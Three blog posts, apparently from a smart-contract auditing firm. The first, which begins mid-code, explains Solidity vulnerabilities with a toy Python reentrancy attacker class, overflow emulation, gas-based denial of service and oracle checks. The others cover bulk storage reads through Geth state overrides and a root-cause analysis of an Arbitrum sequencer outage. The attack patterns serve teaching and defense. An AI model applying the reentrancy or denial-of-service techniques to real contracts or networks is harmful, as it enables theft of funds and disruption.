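    """Toy ledger: `withdraw_unsafe` makes the external call before the state
    update (the reentrancy bug); `withdraw_safe` follows checks-effects-interactions."""

    def __init__(self):
        self.balances = {}

    def deposit(self, account, amount):
        self.balances[account] = self.balances.get(account, 0) + amount

    def withdraw_unsafe(self, account):
        amount = self.balances.get(account, 0)
        if amount:
            account.receive(self, amount)   # interaction first: exploitable
            self.balances[account] = 0      # effect last

    def withdraw_safe(self, account):
        amount = self.balances.get(account, 0)
        if amount:
            self.balances[account] = 0      # effect first
            account.receive(self, amount)   # interaction last

class Attacker:
    """Re-enters the withdraw function a bounded number of times on receipt."""

    def __init__(self, entry, max_reentries=2):
        self.entry = entry
        self.max_reentries = max_reentries
        self.reentries = 0
        self.received = 0

    def receive(self, vault, amount):
        self.received += amount
        if self.reentries < self.max_reentries:
            self.reentries += 1
            self.entry(self)                # re-enter before balance is zeroed
```

With a 100-unit deposit and two re-entries, the unsafe vault pays out 300 units, while the safe vault pays out exactly 100: any re-entry against the safe vault sees a zeroed balance.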

    Integer Overflow/Underflow

Solidity uses fixed-size integer data types for various calculations. Exceeding a type's maximum or minimum value results in an overflow or underflow. In Solidity versions 0.8.0 and above, arithmetic reverts automatically when this happens, which can itself cause unexpected reverts in your smart contracts. Inside unchecked blocks, on the other hand, integer variables silently wrap around, which can lead to unexpected behavior unless there is a particular reason why overflow and underflow cannot occur.
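The wrap-around semantics of unchecked arithmetic can be emulated in Python (whose integers are arbitrary-precision) by reducing modulo 2**256:

```python
UINT256_MAX = 2**256 - 1

def unchecked_add(a, b):
    # Like Solidity `unchecked { a + b }` on uint256: overflow wraps past zero
    return (a + b) % 2**256

def unchecked_sub(a, b):
    # Like Solidity `unchecked { a - b }`: underflow wraps to a huge value
    return (a - b) % 2**256
```

For example, unchecked_add(UINT256_MAX, 1) yields 0 and unchecked_sub(0, 1) yields UINT256_MAX; with checked (0.8.0+) arithmetic, both operations would revert instead.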

    Out-of-Gas Situations

    Ethereum sets gas limits on transactions to prevent infinite loops and resource exhaustion. Smart contract developers must know these limits and gracefully handle out-of-gas situations.

    For example, a resource-intensive loop can cause a transaction to fail due to hitting the gas limit, which may result in a frustrating user experience.

    Sometimes, this situation can also lead to denial of service (DoS) attacks, where an attacker arbitrarily extends the length of the loop, effectively causing the functionality to become disabled.

    An example of this scenario would be a function that loops over all registered users and sends them some funds. An attacker could increase the length of this loop by registering many bogus accounts with this system. 

In general, it is preferable to avoid unbounded loops (and especially nested ones) and to adopt a pull system, in which individual users request an operation, rather than a push system that performs the operation for all users.
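The pull pattern can be sketched in Python (illustrative names, not Solidity): rather than one function looping over every registered user, each user claims individually, so every call does a constant amount of work regardless of how many accounts exist:

```python
class Rewards:
    """Pull-based payouts: users claim individually instead of the contract
    iterating over every registered account (an attacker-extendable loop)."""

    def __init__(self):
        self.owed = {}

    def accrue(self, user, amount):
        self.owed[user] = self.owed.get(user, 0) + amount

    def claim(self, user):
        # Each call touches only one account: O(1) work, bounded gas
        return self.owed.pop(user, 0)
```

Registering bogus accounts no longer affects anyone else's cost, since no transaction ever iterates over the full user set.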

    Oracle Staleness and Manipulation

Some contracts interact with oracles, which make off-chain data available on the blockchain, such as a Chainlink price feed. When interacting with oracles, developers should perform basic sanity checks on the provided data and have a backup plan in case the oracle fails.

For instance, contracts should always check that the data is not stale, by verifying that the timestamp of the last data point is no older than a specified threshold. They should also check that the data is not an anomalous value, such as zero or a negative number. In these cases, the contract should fall back to a sensible default or pause the application until the feed starts reporting correct data again.
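These sanity checks amount to only a few lines. Here is an illustrative Python sketch; the threshold and function names are our own:

```python
MAX_AGE_SECONDS = 3600  # hypothetical staleness threshold (1 hour)

def validate_feed(answer, updated_at, now):
    """Reject anomalous or stale oracle data before using it."""
    if answer <= 0:
        raise ValueError("anomalous price (zero or negative)")
    if now - updated_at > MAX_AGE_SECONDS:
        raise ValueError("stale price feed")
    return answer
```

On a validation failure, the caller would fall back to a sensible default or pause, as described above.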

    Developers should use only high-quality oracles to avoid some of the issues mentioned above. Some oracles, such as pricing data from an automated market maker (AMM), cannot be relied upon because they may suffer from value manipulation. Such manipulations will then have a ripple effect on your application as well.

    Conclusion: Solidity Security Vulnerabilities

    Solidity is a powerful language, but it’s easy to make mistakes that lead to severe vulnerabilities. These are only a tiny sample of the many vulnerabilities that can have a damaging effect on a smart contract. Therefore, before going live on the mainnet, it’s essential to audit your code. 

    You can also use tools like the Dedaub Security Suite to catch issues early. This tool helps you find and fix vulnerabilities in your smart contracts, giving you confidence in your code before deployment. Create your free account today at app.dedaub.com

  • Bulk Storage Extraction

    Bulk Storage Extraction

    Most Dapp developers have heard of and probably use the excellent Multicall contract to bundle their eth_calls and reduce latency for bulk ETL in their applications (we do too, we even have a python library for it: Manifold).

Unfortunately, we cannot use this same trick when reading storage slots, as we discovered when developing our storage explorer: developers are forced to issue an eth_getStorageAt for each slot they want to query. Luckily, Geth has a trick up its sleeve, the "State Override Set", which, with a little ingenuity, we can leverage for bulk storage extraction.

    Bulk Storage Extraction | Geth Trickery

    The “state-override set” parameter of Geth’s eth_call implementation is a powerful but not very well-known feature. (The feature is also present in other Geth-based nodes, which form the base infrastructure for most EVM chains!) This feature enables transaction simulation over a modified blockchain state without any need for a local fork or other machinery!

Using this, we can change the balance or nonce of any address, as well as set the storage or code of any contract. The latter modification is the important one here: it allows us to replace the code at the address whose storage we want to query with our own contract that implements arbitrary storage lookups.

    Here is the detailed structure of state-override set entries:

| Field | Type | Bytes | Optional | Description |
| --- | --- | --- | --- | --- |
| `balance` | Quantity | <32 | Yes | Fake balance to set for the account before executing the call. |
| `nonce` | Quantity | <8 | Yes | Fake nonce to set for the account before executing the call. |
| `code` | Binary | any | Yes | Fake EVM bytecode to inject into the account before executing the call. |
| `state` | Object | any | Yes | Fake key-value mapping to override all slots in the account storage before executing the call. |
| `stateDiff` | Object | any | Yes | Fake key-value mapping to override individual slots in the account storage before executing the call. |
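Putting the pieces together, the request can be assembled as plain JSON-RPC. The helper below is our own sketch (not a standard client API); reader_code would be the runtime bytecode of a bulk-reader contract like the one discussed in this post, and the slot keys are packed as a contiguous array of 32-byte words:

```python
def build_bulk_storage_call(contract, slots, reader_code, block="latest"):
    """Build an eth_call JSON-RPC request whose state-override set replaces
    `contract`'s code with bulk-reader bytecode, passing slot keys as calldata."""
    # Each slot key becomes one zero-padded 32-byte (64 hex char) word
    calldata = "0x" + "".join(format(slot, "064x") for slot in slots)
    return {
        "jsonrpc": "2.0",
        "id": 1,
        "method": "eth_call",
        "params": [
            {"to": contract, "data": calldata},
            block,
            {contract: {"code": reader_code}},  # the state-override set
        ],
    }
```

POSTing this payload to a Geth-based node returns the concatenated 32-byte storage values in the same order as the requested slots.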

    Bulk Storage Extraction | Contract Optimizoor

The following handwritten smart contract has been optimized to maximize the number of storage slots we can read in a given transaction. Before diving into the results, I'd like to take an aside to walk through this contract, as it's a good example of an optimized single-use contract with some clever (or at least we think so) shortcuts.

    
    [00] PUSH0              # [0], initial loop counter is 0  
    [01] JUMPDEST  
    [02] DUP1               # [loop_counter, loop_counter]  
    [03] CALLDATASIZE       # [size, loop_counter, loop_counter]
    [04] EQ                 # [bool, loop_counter]  
    [05] PUSH1 0x13         # [0x13, bool, loop_counter]  
    [07] JUMPI              # [loop_counter]  
    [08] DUP1               # [loop_counter, loop_counter]  
[09] CALLDATALOAD       # [slot, loop_counter]  
[0a] SLOAD              # [value, loop_counter]  
[0b] DUP2               # [loop_counter, value, loop_counter]  
    [0c] MSTORE             # [loop_counter]  
    [0d] PUSH1 0x20         # [0x20, loop_counter]  
    [0f] ADD                # [loop_counter] we added 32 to it, to move 1 word  
    [10] PUSH1 0x1          # [0x1, loop_counter]  
    [12] JUMP               # [loop_counter]  
    [13] JUMPDEST  
    [14] CALLDATASIZE       # [size]  
    [15] PUSH0              # [0, size]  
    [16] RETURN             # []
    

To better understand what's going on, we can take a look at the high-level code (this was actually generated by our decompiler):

    function function_selector() public payable {
    
        v0 = v1 = 0;
    
        while (msg.data.length != v0) {
            MEM[v0] = STORAGE[msg.data[v0]];
            v0 += 32;
        }
    
        return MEM[0: msg.data.length];
    }

    Walking through the code we can see that we loop through the calldata, reading each word, looking up the corresponding storage location, and writing the result into memory.

    The main optimizations are:

    • removing the need for a dispatch function
    • re-using the loop counter to track the memory position for writing results
• removing ABI encoding by assuming that the input is a contiguous array of 32-byte words and using the calldata length (CALLDATASIZE) to calculate the number of elements

    If you think you can write a shorter or more optimized bytecode please submit a PR to storage-extractor and @ us on twitter.

    Bulk Storage Extraction | Results

    THEORETICAL RESULTS

To calculate the maximum number of storage slots we can extract, we need three cost components: the execution cost (a constant cost plus a cost per iteration), the memory expansion cost $$(3x+(x^2/512))$$, and the calldata cost.

    We can break down the cost of the execution as follows:

    • The start, the range check and the exit will always run at least once
    • Each storage location will result in 1 range check and 1 lookup

Calculating the calldata cost is slightly more complex, as it is variably priced: zero bytes cost 4 gas each, while non-zero bytes cost 16 gas. We therefore estimate the average cost of a random 32-byte word.

    zero_byte_gas = 4
    non_zero_byte_gas = 16
    
# Probability that a random byte is zero: all 8 of its bits must be 0
prob_rand_byte_is_zero = (0.5**8) # 0.00390625
    prob_rand_byte_non_zero = 1 - prob_rand_byte_is_zero # 0.99609375
    
    avg_cost_byte = (non_zero_byte_gas * prob_rand_byte_non_zero) + \
    				(zero_byte_gas * prob_rand_byte_is_zero) # (16 * 0.99609375) + (04 * .00390625) = 15.953125

Therefore the average word costs $$15.953125 * 32 \approx 510.5$$ gas, for a total calldata cost of $$510.5x$$.

    We can combine all of these equations and solve for the gas limit to get the maximum number of storage slots that can be read in one call.

Therefore, given a 50 million gas limit (the default RPC gas cap for Geth), we can read an average of 18514 slots.
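This figure can be reproduced with a small quadratic solver. The constants below are our own reading of the bytecode's costs (post-Berlin cold SLOAD at 2100 gas, plus loop, calldata, and memory-expansion costs) and land within a fraction of a percent of the number above:

```python
import math

# Assumed costs, per our reading of the bytecode (post-Berlin, cold slots):
INTRINSIC = 21_000                    # transaction base cost
PER_SLOT_OPS = 2_151                  # range check + loop body + cold SLOAD (2100)
AVG_CALLDATA_WORD = 15.953125 * 32    # average cost of one random 32-byte slot key
MEM_LINEAR = 3                        # linear memory-expansion cost per word

def max_slots(gas_limit=50_000_000):
    # Solve INTRINSIC + b*x + x**2/512 = gas_limit for x (quadratic formula)
    a = 1 / 512                       # quadratic memory-expansion coefficient
    b = PER_SLOT_OPS + AVG_CALLDATA_WORD + MEM_LINEAR
    c = INTRINSIC - gas_limit
    return int((-b + math.sqrt(b * b - 4 * a * c)) / (2 * a))
```

With these assumptions, solving for a 50M gas limit yields roughly 18.5 thousand slots.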

    This number will change based on the actual storage slots being accessed, with most users being able to access more. This is due to the fact that most storage variables are in the initial slots of the contract, with only mapping and dynamic arrays being pushed to random slots (or people using advanced storage layouts such as those used in Diamond proxies).

    PRACTICAL RESULTS

    To show the impact of this approach, we wrote a python script which queries a number of storage slots, first using normal RPC requests and batched RPC requests for the normal eth_getStorageAt, and then comparing to the optimized eth_call with state-override set. All the testing code can be found in the storage-extractor repo, along with the bytecode and results.

To isolate variable latency as a factor, we ran the tests on the same machine as our node, with latency re-added via asyncio.sleep for a controlled testing environment. To properly understand the results, let's look at the best-case scenario of 200 concurrent connections.

In order to properly represent the three methods, we need a logarithmic y-axis, since standard parallel `eth_getStorageAt`s are too slow. As you can see, even with 200 connections, standard RPC calls are 57 times slower than RPC batching and 103 times slower than `eth_call` with state-override.

We can take a closer look at the difference between batching and call overrides in the next graph. As you can see, call overrides are faster in all scenarios since they require fewer connections; this is most noticeable in the top-left graph, which highlights the impact of latency on the overall duration.

    Conclusion

    To wrap up this Dedaub blog post, I’d like to thank the Geth developers for all the hard work they’ve been doing, and the extra thought they put into their RPC to enable us to do funky stuff like this to maximize the performance of our applications.

    If you have a cool use of the state-override set please tweet us, and, if you’d like to collaborate, you can submit a PR on the accompanying github repo (storage-extractor).

  • Arbitrum Sequencer Outage | Root Cause Analysis

    Arbitrum Sequencer Outage | Root Cause Analysis

The Arbitrum network experienced significant downtime on December 15 due to problems with its sequencer and feed: the network was down for almost three hours. The major outage began at 10:29 a.m. ET amid a substantial increase in a type of network traffic called Inscriptions. At the time, Arbitrum's layer-2 network had processed over 22.29 million transactions and had a total value locked of $2.3 billion. Despite the network's success, the current design suffers from a significant chokepoint when posting transactions to L1, causing the sequencer to stall. While advancements such as Arbitrum Nova and Proto-Danksharding might alleviate these design issues, this is not the first time Arbitrum has experienced such problems: a bug in the sequencer also halted the network in June 2023.

    Arbitrum Sequencer Outage | Background

Arbitrum is a Layer-2 (L2) solution that settles transactions off the Ethereum mainnet. L2s provide lower gas fees and reduce congestion on the primary blockchain (in this case Ethereum, the L1). The current incarnation of Arbitrum is called Nitro. Arbitrum Nitro processes transactions in two stages: sequencing, where transactions are ordered and committed to this sequence, and deterministic execution, where each transaction undergoes a state transition function. Nitro combines Ethereum emulation software with extensions for cross-chain functionality and uses an optimistic rollup protocol based on interactive fraud proofs.

    The Sequencer is a key component of the Nitro architecture. Its primary role is to order incoming transactions honestly, typically following a first-come, first-served policy. This is a centralized component operated by Offchain Labs. The Sequencer publishes its transaction order both as a real-time feed and to Ethereum, in the calldata of an "Inbox" smart contract. This publication ensures the final and authoritative transaction ordering. Additionally, a Delayed Inbox mechanism exists for L1 Ethereum contracts to submit transactions, and as a backup for direct submission in case of Sequencer failure or censorship.

    Arbitrum Sequencer Outage | Root cause

In the two hours prior to the outage, more than 90% of Arbitrum traffic consisted of Ethscriptions. Ethscriptions are digital artifacts on EVM chains created using Ethereum calldata. Unlike traditional NFTs managed by smart contracts, Ethscriptions make the blockchain data itself the unique artifact. They are inspired by Bitcoin inscriptions (Ordinals) but function differently. Creating an Ethscription involves selecting an image, converting it to data-URI format, then to hexadecimal format, and finally embedding it into the Hex data field of a 0 ETH transaction. Each Ethscription must be unique; duplicate data submissions are ignored. Owners can use Ethscription IDs for proof or transfer of ownership. In practice, the calldata of an Ethscription looks like this:

    data: {"p":"fair-20","op":"mint","tick":"fair","amt":"1000"}

    Calldata example of an Ethscription. This represents a token mint.

Since Ethscriptions are very cheap, one can create a lot of them for the same unit of cost. Indeed, a staggering 90% of transactions posted on-chain were Ethscriptions. Also, for a relatively low cost, the amount of transaction entropy that needed to be committed to L1 increased to 80MB/hr, vs. the 3MB/hr that was typical before the traffic spike. We calculated this by looking at average on-chain transaction postings by the sequencer.

    Now, look at the architecture diagram of Arbitrum below. Note that in order to commit transaction sequences to L1, the data poster needs to post the increased amount of data over a larger number of transactions. Prior to the outage, the number of transactions posted per hour was around 10 – 20x higher than the December mean.

However, the code responsible for posting these transactions has a built-in limitation on the rate at which L1 batches are posted. At the time of the outage, if there were 10 batches still in the L1 mempool, no more batches would be sent to L1, stalling the sequencer. This limit was raised to 20 batches after the outage. This is probably not a good long-term solution, however, as it increases the chances of batches needing to be reposted due to transaction nonce issues.

    // Check that posting a new transaction won't exceed maximum pending
    // transactions in mempool.
    if cfg.MaxMempoolTransactions > 0 {
      unconfirmedNonce, err := p.client.NonceAt(ctx, p.Sender(), nil)
      if err != nil {
        return fmt.Errorf("getting nonce of a dataposter sender: %w", err)
      }
      if nextNonce >= cfg.MaxMempoolTransactions+unconfirmedNonce {
        return fmt.Errorf(
          "... transaction with nonce: %d will exceed max mempool size ...",
          nextNonce, cfg.MaxMempoolTransactions, unconfirmedNonce
        )
      }
    }
    return nil

The batch poster is responsible for posting the sequenced transactions as Ethereum calldata.

    Arbitrum Sequencer Outage | Recommendations

There are several indications that the sequencer, and thus the network, had not been tested enough in a realistic setting or in an adversarial environment. Luckily, the upcoming Proto-Danksharding upgrade to Ethereum should help reduce L1-induced congestion. Irrespective of this, the Arbitrum engineers can consider the following recommendations:

    • Whether the Arbitrum gas price of L2 calldata is set too low, compared to other kinds of operations. Gas is an anti-DoS mechanism, which is intimately tied to the L1 characteristics. If this increase in L2 calldata causes a proportionally large increase in batch size, then attackers can craft L2 transactions with large calldatas that result in batches that don’t compress well under Brotli compression, causing a DoS attack on the sequencer. Note that Arbitrum Nova should not suffer as much from this issue as the transaction data is not stored on L1, only a hash is.
    • Whether there is a tight feedback loop between the size of the L1 batches currently in the mempool and L2 gas price. There is an indirect feedback loop, via the gas price on L1 and backlog sizes, but this may not be too tight. In addition, since the sequencer is centralized anyway, anti-DoS measures might be encoded directly into it to reject transactions. (Note: A more decentralized sequencer is being considered for the future, so this last measure wouldn’t work)
• Long-term, the engineers should put more research into making the rollups more efficient, to decrease the sizes of batches committed to L1. This may include ZKP rollups at some point.
    • Additionally, security audits of the sequencer should consider DoS situations, both through simulation/fuzzing and by having auditors think through hostile scenarios, applying adversarial thinking based on their deep knowledge of the involved chains.

    Finally, the Arbitrum team made a small change to the way transactions are soft-committed. In this change the feed backlog is populated irrespective of whether the sequencer coordinator is running, which carries its own risks but enables dApps running on Arbitrum to be more responsive during certain periods.

Disclaimer: The Arbitrum sequencer is solely operated by Offchain Labs. Thus, most of the information regarding its operational issues (such as logs) is not publicly available, so it is hard to get a complete picture of the issue. Dedaub has not audited Arbitrum or Offchain Labs software. Dedaub has, however, audited other (non-Arbitrum) software and projects running on Arbitrum, such as GMX, Chainlink, Rysk & Stella.